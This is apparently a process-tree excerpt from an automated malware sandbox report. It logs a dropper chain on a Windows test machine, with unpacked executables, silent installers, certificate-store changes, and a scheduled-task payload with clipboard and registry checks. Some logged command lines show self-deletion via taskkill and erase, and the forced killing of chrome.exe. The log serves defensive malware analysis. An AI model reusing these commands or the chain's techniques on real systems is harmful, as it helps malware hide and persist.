C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0990c8b597f.exe4⤵
- Loads dropped DLL
PID:1520 -
C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue0990c8b597f.exeTue0990c8b597f.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1648 -
C:\Users\Admin\AppData\Local\Temp\is-J9KIS.tmp\Tue0990c8b597f.tmp"C:\Users\Admin\AppData\Local\Temp\is-J9KIS.tmp\Tue0990c8b597f.tmp" /SL5="$1016C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue0990c8b597f.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2104 -
C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue0990c8b597f.exe"C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue0990c8b597f.exe" /SILENT7⤵
- Executes dropped EXE
PID:2204 -
C:\Users\Admin\AppData\Local\Temp\is-9AV8N.tmp\Tue0990c8b597f.tmp"C:\Users\Admin\AppData\Local\Temp\is-9AV8N.tmp\Tue0990c8b597f.tmp" /SL5="$301B4,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue0990c8b597f.exe" /SILENT8⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:2280 -
C:\Users\Admin\AppData\Local\Temp\is-UJ568.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-UJ568.tmp\postback.exe" ss19⤵
- Executes dropped EXE
PID:2780
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0956c36b51.exe /mixone4⤵
- Loads dropped DLL
PID:1276 -
C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue0956c36b51.exeTue0956c36b51.exe /mixone5⤵
- Executes dropped EXE
PID:604 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Tue0956c36b51.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue0956c36b51.exe" & exit6⤵PID:2340
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Tue0956c36b51.exe" /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2372
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0971aafeebb6f.exe4⤵
- Loads dropped DLL
PID:1664 -
C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue0971aafeebb6f.exeTue0971aafeebb6f.exe5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1944 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:1616
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:304
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue093cbcf0222440.exe4⤵
- Loads dropped DLL
PID:764
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue093cbcf0222440.exeTue093cbcf0222440.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1040 -
C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue093cbcf0222440.exe"C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue093cbcf0222440.exe" -u2⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:1892
-
-
C:\Users\Admin\AppData\Local\Temp\D1C0.exeC:\Users\Admin\AppData\Local\Temp\D1C0.exe1⤵
- Executes dropped EXE
PID:1128 -
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
PID:1164
-
-
C:\Users\Admin\AppData\Local\Temp\472F.exeC:\Users\Admin\AppData\Local\Temp\472F.exe1⤵
- Executes dropped EXE
- Modifies system certificate store
PID:1720
-
C:\Windows\system32\taskeng.exetaskeng.exe {F39F371A-5F32-42E0-9509-946DB4D4680A} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1308
-
C:\Windows\system32\taskeng.exetaskeng.exe {D70396ED-6DE2-489F-99DA-FF3A62177A81} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2136
-
C:\Program Files\Mozilla Firefox\default-browser-agent.exe"C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task2⤵PID:2460
-
-
C:\Users\Admin\AppData\Roaming\hfbrctuC:\Users\Admin\AppData\Roaming\hfbrctu2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2804
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {824A5DE7-D3EB-4720-B901-B1AEBCD5FFEB} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2388
-
C:\Users\Admin\AppData\Roaming\hfbrctuC:\Users\Admin\AppData\Roaming\hfbrctu2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2736
-